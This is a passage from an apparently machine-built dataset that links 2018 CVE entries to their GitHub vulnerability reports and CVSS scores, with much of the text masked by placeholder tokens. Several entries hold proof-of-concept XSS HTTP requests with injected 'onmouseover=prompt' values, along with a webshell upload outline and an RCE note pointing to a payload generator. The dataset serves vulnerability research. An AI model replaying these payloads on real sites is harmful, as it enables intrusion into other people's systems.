  26748. "Issue_Created_At": "2018-10-05T12:06:20Z",
  26749. "description": "heap buffer overflow in APITAG of svg.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of svg.c Steps to Reproduce APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG a NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  26750. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26751. "severity": "MEDIUM",
  26752. "baseScore": 6.5,
  26753. "impactScore": 3.6,
  26754. "exploitabilityScore": 2.8
  26755. },
  26756. {
  26757. "CVE_ID": "CVE-2018-18025",
  26758. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1335",
  26759. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1335",
  26760. "Repo_new": "imagemagick/imagemagick",
  26761. "Issue_Created_At": "2018-10-05T12:00:14Z",
  26762. "description": "heap buffer overflow in APITAG of pict.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of pict.c Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffdad0: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa APITAG NUMBERTAG c NUMBERTAG fffdae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul 
NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
  26763. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26764. "severity": "MEDIUM",
  26765. "baseScore": 6.5,
  26766. "impactScore": 3.6,
  26767. "exploitabilityScore": 2.8
  26768. },
  26769. {
  26770. "CVE_ID": "CVE-2018-18074",
  26771. "Issue_Url_old": "https://github.com/requests/requests/issues/4716",
  26772. "Issue_Url_new": "https://github.com/psf/requests/issues/4716",
  26773. "Repo_new": "psf/requests",
  26774. "Issue_Created_At": "2018-06-27T09:06:49Z",
  26775. "description": "Should Authorization header be cleared in https > http redirect?. This may be considered intentional behaviour (in which case feel free to close this), but if a request is made to an https endpoint with authorization and it redirects to http on the same host, the Authorization header is not stripped and will be exposed on the wire. Expected Result rebuild_auth would strip the Authorization header if the scheme is changed from https to http. Actual Result The credentials that were intended to be sent over TLS were transmitted in plaintext with the redirected request. Reproduction Steps Run an HTTPS server on localhost NUMBERTAG that replies with a NUMBERTAG redirect to APITAG , and a plain HTTP server (or netcat) on localhost NUMBERTAG Then run APITAG The basic auth credentials are sent in plaintext to APITAG (the APITAG is just because I had a self signed cert). Here's the code I used for the SSL server: CODETAG System Information CODETAG",
  26776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26777. "severity": "HIGH",
  26778. "baseScore": 7.5,
  26779. "impactScore": 3.6,
  26780. "exploitabilityScore": 3.9
  26781. },
  26782. {
  26783. "CVE_ID": "CVE-2018-18082",
  26784. "Issue_Url_old": "https://github.com/caokang/waimai/issues/6",
  26785. "Issue_Url_new": "https://github.com/caokang/waimai/issues/6",
  26786. "Repo_new": "caokang/waimai",
  26787. "Issue_Created_At": "2018-10-09T14:17:18Z",
  26788. "description": "xss Vulnerability in Waimai Super Cms. xss Vulnerability in Waimai Super Cms In waimai Super Cms master, there is an XSS vulnerability via the PATHTAG and PATHTAG fname parameter. Payload: APITAG alert NUMBERTAG APITAG Exploit URL / Algorithm NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" sample APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" sss NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" furf APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fid NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; 
name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" dsdd NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG",
  26789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26790. "severity": "MEDIUM",
  26791. "baseScore": 6.1,
  26792. "impactScore": 2.7,
  26793. "exploitabilityScore": 2.8
  26794. },
  26795. {
  26796. "CVE_ID": "CVE-2018-18086",
  26797. "Issue_Url_old": "https://github.com/SukaraLin/php_code_audit_project/issues/1",
  26798. "Issue_Url_new": "https://github.com/l1nk3rlin/php_code_audit_project/issues/1",
  26799. "Repo_new": "l1nk3rlin/php_code_audit_project",
  26800. "Issue_Created_At": "2018-10-09T07:13:32Z",
  26801. "description": "Empirecms NUMBERTAG getshell. The vulnerability trigger point is at the red frame in the image FILETAG Click System > System Settings > Manage Data Table to import your own mod file. APITAG Mod file content FILETAG finally getshell FILETAG",
  26802. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  26803. "severity": "HIGH",
  26804. "baseScore": 8.8,
  26805. "impactScore": 5.9,
  26806. "exploitabilityScore": 2.8
  26807. },
  26808. {
  26809. "CVE_ID": "CVE-2018-18087",
  26810. "Issue_Url_old": "https://github.com/Bixie/pagekit-portfolio/issues/44",
  26811. "Issue_Url_new": "https://github.com/bixie/pagekit-portfolio/issues/44",
  26812. "Repo_new": "bixie/pagekit-portfolio",
  26813. "Issue_Created_At": "2018-10-08T10:13:24Z",
  26814. "description": "Store XSS in image url field. Portfolio Version NUMBERTAG PHP Version NUMBERTAG Login user who has APITAG portfolio \" privilege can inject arbitrary web script or HTML via editor, XSS vulnerability will be triggered by visiting /portfolio/${project_title}. POC FILETAG FILETAG Title field also vulnerable to XSS,",
  26815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26816. "severity": "MEDIUM",
  26817. "baseScore": 5.4,
  26818. "impactScore": 2.7,
  26819. "exploitabilityScore": 2.3
  26820. },
  26821. {
  26822. "CVE_ID": "CVE-2018-18088",
  26823. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1152",
  26824. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1152",
  26825. "Repo_new": "uclouvain/openjpeg",
  26826. "Issue_Created_At": "2018-10-09T05:37:21Z",
  26827. "description": "OPENJPEG null ptr dereference in PATHTAG DESCRIPTION OPENJPEG null ptr dereference in PATHTAG VERSION OPENJPEG NUMBERTAG GDB Output NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG a0e1 in main (argc NUMBERTAG arg NUMBERTAG fffffffddf8) at PATHTAG NUMBERTAG ffff NUMBERTAG e7b NUMBERTAG in __libc_start_main (main NUMBERTAG ed APITAG , argc NUMBERTAG arg NUMBERTAG fffffffddf8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG aa in _start () GDB Information pwndbg> print red NUMBERTAG int NUMBERTAG pwndbg> print image APITAG NUMBERTAG OPJ_INT NUMBERTAG pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. poc Contact me if you need Poc file at EMAILTAG or EMAILTAG",
  26828. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26829. "severity": "MEDIUM",
  26830. "baseScore": 6.5,
  26831. "impactScore": 3.6,
  26832. "exploitabilityScore": 2.8
  26833. },
  26834. {
  26835. "CVE_ID": "CVE-2018-18190",
  26836. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/41",
  26837. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/41",
  26838. "Repo_new": "gopro/gpmf-parser",
  26839. "Issue_Created_At": "2018-10-09T04:09:19Z",
  26840. "description": "divide by zero crash. Caused by APITAG : APITAG if type not in APITAG APITAG will return NUMBERTAG Workaround: ERRORTAG APITAG Report: ERRORTAG Base NUMBERTAG encoded payload: ERRORTAG",
  26841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26842. "severity": "MEDIUM",
  26843. "baseScore": 5.5,
  26844. "impactScore": 3.6,
  26845. "exploitabilityScore": 1.8
  26846. },
  26847. {
  26848. "CVE_ID": "CVE-2018-18198",
  26849. "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/422",
  26850. "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/422",
  26851. "Repo_new": "redaxo/redaxo4",
  26852. "Issue_Created_At": "2018-09-25T07:56:34Z",
  26853. "description": "NUMBERTAG Reflected Cross site scripting (XSS) vulnerability in REDAXO NUMBERTAG details in PATHTAG CODETAG The value of $opener_input_field is obtained from an HTTP request and is a string. In PATHTAG ERRORTAG This directly outputs $opener_input_field to the js code, causing XSS vulnerabilities. POC The user directly accesses the URL if the user has logged in. URLTAG XSS will be triggered as shown: APITAG FILETAG Credit: APITAG of APITAG",
  26854. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26855. "severity": "MEDIUM",
  26856. "baseScore": 6.1,
  26857. "impactScore": 2.7,
  26858. "exploitabilityScore": 2.8
  26859. },
  26860. {
  26861. "CVE_ID": "CVE-2018-18201",
  26862. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/2",
  26863. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/2",
  26864. "Repo_new": "yanchongchong/swallow",
  26865. "Issue_Created_At": "2018-10-08T03:53:50Z",
  26866. "description": "qibosoft_csrf. CODETAG",
  26867. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26868. "severity": "HIGH",
  26869. "baseScore": 8.8,
  26870. "impactScore": 5.9,
  26871. "exploitabilityScore": 2.8
  26872. },
  26873. {
  26874. "CVE_ID": "CVE-2018-18209",
  26875. "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/59",
  26876. "Issue_Url_new": "https://github.com/chekun/dilicms/issues/59",
  26877. "Repo_new": "chekun/dilicms",
  26878. "Issue_Created_At": "2018-10-10T09:49:17Z",
  26879. "description": "XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment. XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment Software Link : FILETAG POC : POST PATHTAG HTTP NUMBERTAG Host: localhost Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dili_session=xxxxx Connection: close Upgrade Insecure Requests NUMBERTAG APITAG .jpg NUMBERTAG B .gif NUMBERTAG B .png NUMBERTAG B APITAG Screenshots : FILETAG FILETAG FILETAG",
  26880. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26881. "severity": "MEDIUM",
  26882. "baseScore": 6.1,
  26883. "impactScore": 2.7,
  26884. "exploitabilityScore": 2.8
  26885. },
  26886. {
  26887. "CVE_ID": "CVE-2018-18215",
  26888. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/3",
  26889. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/3",
  26890. "Repo_new": "yanchongchong/swallow",
  26891. "Issue_Created_At": "2018-10-10T16:20:36Z",
  26892. "description": "youke NUMBERTAG csrf. CODETAG",
  26893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26894. "severity": "HIGH",
  26895. "baseScore": 8.8,
  26896. "impactScore": 5.9,
  26897. "exploitabilityScore": 2.8
  26898. },
  26899. {
  26900. "CVE_ID": "CVE-2018-18240",
  26901. "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/454",
  26902. "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/454",
  26903. "Repo_new": "pippo-java/pippo",
  26904. "Issue_Created_At": "2018-09-28T11:19:15Z",
  26905. "description": "Lead to RCE when unmarshal xml data with APITAG The APITAG unmarshal xml data based on APITAG it doesn't check the data; when the data contains malicious types, then it may lead to remote code execution; The Struts2 framework once had the same issue( URLTAG Using the following code snippet to convert the malicious xml data\uff1b CODETAG The malicious xml data is as follows\uff1a FILETAG The tool marshalsec( URLTAG can help to generate more kinds of payload including the one above; To mitigate the vulnerability, since version APITAG provides developers with some APIs(such APITAG to restrict the types to be unmarshalled\uff1b Here we could fix the issue refer to the patch URLTAG of Struts2.",
  26906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26907. "severity": "CRITICAL",
  26908. "baseScore": 9.8,
  26909. "impactScore": 5.9,
  26910. "exploitabilityScore": 3.9
  26911. },
  26912. {
  26913. "CVE_ID": "CVE-2018-18242",
  26914. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/4",
  26915. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/4",
  26916. "Repo_new": "yanchongchong/swallow",
  26917. "Issue_Created_At": "2018-10-11T06:43:42Z",
  26918. "description": "youke NUMBERTAG SQL inject. CODETAG Using this packet test\u3002A SQL injection vulnerability exists in FILETAG",
  26919. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26920. "severity": "CRITICAL",
  26921. "baseScore": 9.8,
  26922. "impactScore": 5.9,
  26923. "exploitabilityScore": 3.9
  26924. },
  26925. {
  26926. "CVE_ID": "CVE-2018-18261",
  26927. "Issue_Url_old": "https://github.com/caokang/waimai/issues/7",
  26928. "Issue_Url_new": "https://github.com/caokang/waimai/issues/7",
  26929. "Repo_new": "caokang/waimai",
  26930. "Issue_Created_At": "2018-10-11T13:51:14Z",
  26931. "description": "xss Vulnerability in Waimai Super Cms NUMBERTAG ia fcname parameter. In waimai Super Cms NUMBERTAG there is an XSS vulnerability via the PATHTAG fcname parameter. Payload: APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG page_iframe_url= URLTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG fcname=form APITAG alert NUMBERTAG APITAG &fcsort NUMBERTAG",
  26932. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26933. "severity": "MEDIUM",
  26934. "baseScore": 6.1,
  26935. "impactScore": 2.7,
  26936. "exploitabilityScore": 2.8
  26937. },
  26938. {
  26939. "CVE_ID": "CVE-2018-18270",
  26940. "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
  26941. "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
  26942. "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
  26943. "Issue_Created_At": "2018-10-12T14:29:25Z",
  26944. "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_news_url parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors: m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" Dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" slugform1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; name=\"m1_extra\" Informative NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content 
Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
  26945. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26946. "severity": "MEDIUM",
  26947. "baseScore": 6.1,
  26948. "impactScore": 2.7,
  26949. "exploitabilityScore": 2.8
  26950. },
  26951. {
  26952. "CVE_ID": "CVE-2018-18271",
  26953. "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
  26954. "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
  26955. "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
  26956. "Issue_Created_At": "2018-10-12T14:36:10Z",
  26957. "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_extra parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors:m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" Slugform NUMBERTAG Content Disposition: form data; name=\"m1_extra\" informative1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: 
form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
  26958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26959. "severity": "MEDIUM",
  26960. "baseScore": 6.1,
  26961. "impactScore": 2.7,
  26962. "exploitabilityScore": 2.8
  26963. },
  26964. {
  26965. "CVE_ID": "CVE-2018-18274",
  26966. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/33",
  26967. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/33",
  26968. "Repo_new": "kermitt2/pdfalto",
  26969. "Issue_Created_At": "2018-10-12T07:47:10Z",
  26970. "description": "two bugs in pdfalto. I found two bugs in pdfalto, the details can be found at here URLTAG",
  26971. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26972. "severity": "HIGH",
  26973. "baseScore": 7.8,
  26974. "impactScore": 5.9,
  26975. "exploitabilityScore": 1.8
  26976. },
  26977. {
  26978. "CVE_ID": "CVE-2018-18308",
  26979. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/356",
  26980. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/356",
  26981. "Repo_new": "bigtreecms/bigtree-cms",
  26982. "Issue_Created_At": "2018-12-25T23:05:17Z",
  26983. "description": "CVETAG . I know that this is old case, but can you tell me in what version or commit this is fixed, thank you? FILETAG URLTAG",
  26984. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26985. "severity": "MEDIUM",
  26986. "baseScore": 6.1,
  26987. "impactScore": 2.7,
  26988. "exploitabilityScore": 2.8
  26989. },
  26990. {
  26991. "CVE_ID": "CVE-2018-18315",
  26992. "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/175",
  26993. "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/175",
  26994. "Repo_new": "xuhuisheng/lemon",
  26995. "Issue_Created_At": "2018-10-10T08:27:50Z",
  26996. "description": "\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG FILETAG APITAG FILETAG",
  26997. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  26998. "severity": "HIGH",
  26999. "baseScore": 7.5,
  27000. "impactScore": 3.6,
  27001. "exploitabilityScore": 3.9
  27002. },
  27003. {
  27004. "CVE_ID": "CVE-2018-18316",
  27005. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/5",
  27006. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/5",
  27007. "Repo_new": "yanchongchong/swallow",
  27008. "Issue_Created_At": "2018-10-12T03:06:58Z",
  27009. "description": "emlog_csrf. CODETAG",
  27010. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27011. "severity": "HIGH",
  27012. "baseScore": 8.8,
  27013. "impactScore": 5.9,
  27014. "exploitabilityScore": 2.8
  27015. },
  27016. {
  27017. "CVE_ID": "CVE-2018-18317",
  27018. "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/6",
  27019. "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/6",
  27020. "Repo_new": "yanchongchong/swallow",
  27021. "Issue_Created_At": "2018-10-12T08:17:51Z",
  27022. "description": "dscms_csrf. CODETAG",
  27023. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  27024. "severity": "HIGH",
  27025. "baseScore": 8.8,
  27026. "impactScore": 5.9,
  27027. "exploitabilityScore": 2.8
  27028. },
  27029. {
